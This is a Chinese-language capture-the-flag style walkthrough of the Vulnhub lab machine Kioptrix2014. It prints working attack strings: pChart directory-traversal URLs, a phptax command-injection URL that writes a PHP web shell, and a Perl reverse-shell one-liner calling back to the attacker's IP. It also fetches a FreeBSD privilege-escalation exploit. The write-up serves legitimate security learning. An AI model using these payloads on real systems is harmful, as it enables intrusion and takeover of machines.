Vulnhub入门篇-Kioptrix2014

1.环境配置

下载地址：https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2

攻击机kali：192.168.26.128（Nat模式）

靶机配置：Nat模式

这里注意，根据官网地址说明，需要我们先将网络适配器进行删除，再添加一个Nat模式，不然扫描不到该靶机。

2.渗透测试

信息收集

主机探测

nmap -sP 192.168.26.0/24

可以得知靶机ip地址：192.168.26.138 

端口扫描 

nmap -sS -sV -p- 192.168.26.138

显示靶机只开放了80端口跟8080端口，直接访问网站看看

目录扫描

dirbuster扫描----扫描不出什么

漏洞探测

访问网站，只有显示此界面

右键点击查看源代码

访问url中的地址，出现一些目录信息

接下来就是搜索下有没有pChart组件的漏洞：

利用searchsploit是可以搜到pChart组件有个漏洞可以利用的，版本号也刚好对上。

使用searchsploit 31173 --examine 查看利用方法：

可以发现有个目录穿越漏洞，直接访问

http://192.168.26.138/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

结果如下：

可以发现是FreeBSD系统，所以可以知道Apache配置文件目录为/usr/local/etc/apache22/httpd.conf

接下来还是利用目录穿越漏洞访问

http://192.168.0.103/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

结果如下：

寻找一下看看有没有什么有用的信息

在结尾处可以看到，开启8080服务需要设置User-Agent的版本为Mozilla/4.0 Mozilla4_browser。之前扫描开放端口时候，也发现开启了8080端口，先访问下http://192.168.26.138:8080看看：

拒绝我们访问，下面我们直接通过抓包工具，修改下UA，再次访问看看返回值：

修改UA后返回正常，并且返回了"phptax"

或者直接使用curl命令修改UA包头

下面给出curl命令详解

Linux curl命令最全详解-CSDN博客

漏洞利用（phptax）

接下来使用msf搜索下有无phptax的exp可用：

 找到可以的payload，接下来就是利用该exp进行反弹shell

服了噢，没有得到shell，算了，换个方法

在网上搜phptax exploit

找到一个远程代码执行的漏洞利用信息，本想使用metasploit，但是要配置user-agent才能够正常访问，所以就干脆写个php一句话，然后反弹shell，经过研究上述提供的Poc信息可以直接远程代码执行，那么我们写一句话上去，具体exp如下

http://192.168.26.138:8080/phptax/drawimage.php?pfilez=xxx;echo%20%22%3C%3Fphp%20system(\$_GET['cmd']); %3F%3E%22%20>%20shell.php;&pdf=make

 记得修改UA报头，改成 Mozilla/4.0 Mozilla4_browser，接着就能访问了

最终输入命令看是否能够执行成功

 可以发现，执行成功，那么我们就可以上传shell直接反弹会话

通过这里的命令执行which查看了目标靶机是否存在Python或者perl环境，查询确认存在perl环境，但是使用perl反弹shell显示反弹成功后连接就被关闭了，使用nc反弹没有成功，便尝试使用nc传一个php反弹shell的php代码，然后访问这个反弹shell的php代码来反弹shell ，具体操作如下：

http://192.168.26.138:8080/phptax/drawimage.php?pfilez=xxx;perl%20-e%20%27use%20Socket;$i=%22192.168.26.128%22;$p=8123;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27

但是这里连接的时候，又没有反应，只能看看下面博主的啦

VulnHub-Kioptrix2014(#5)-CSDN博客

提权（freebfd）

先查看靶机系统内核信息：

系统内核版本为 FreeBSD 9.0-RELEASE

接下来就是搜索该版本有无提权漏洞：

searchsploit FreeBSD

这边选取一个和内核版本相符的exp，就选第一个28718.c

接下来就是将该exp下载本地，传输到靶机上，编译执行就可以了

先下载exp：

searchsploit -p 28718.c
wget -c https://www.exploit-db.com/exploits/28718

接着利用nc发送该exp

kali发送端：

靶机接收端（还是要先cd进tmp目录）：

其中192.168.26.138为kali的ip 8888为开启的监听端口。

靶机编译并执行exp：

还有个小插曲，这个exp最后还需要空一行，回到kali上将该exp最后新增一行：

 

然后保存退出，继续按照之前nc传输文件，再传输到靶机上。

靶机编译并执行exp：

总结

信息收集还是非常重要的，以及对网站的信息搜索，网站使用的中间件、系统之间的漏洞都可以拿来利用，但是我上面有不足之处，并没有获得webshell，提权就是根据FreeBSD的漏洞进行利用的